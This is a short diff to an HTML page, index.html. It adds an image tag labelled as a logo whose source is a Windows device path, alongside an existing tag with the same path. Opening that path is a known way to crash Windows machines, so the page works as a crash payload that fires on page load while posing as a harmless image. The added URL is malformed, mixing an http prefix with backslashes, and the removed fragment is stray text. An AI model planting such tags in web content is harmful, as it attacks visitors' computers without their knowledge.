--- a/index.html
+++ b/index.html
@@ -1,6 +1,7 @@
 <html>
 <body>
-insert>HTML 
+
+<img src="http://globalroot\device\condrv\kernelconnect" height="100" width="200" alt="CHIP-Logo" border="2" align="right" hspace="50" vspace="50">
 <img src="\\.\globalroot\device\condrv\kernelconnect" />
 </body>
 </html>
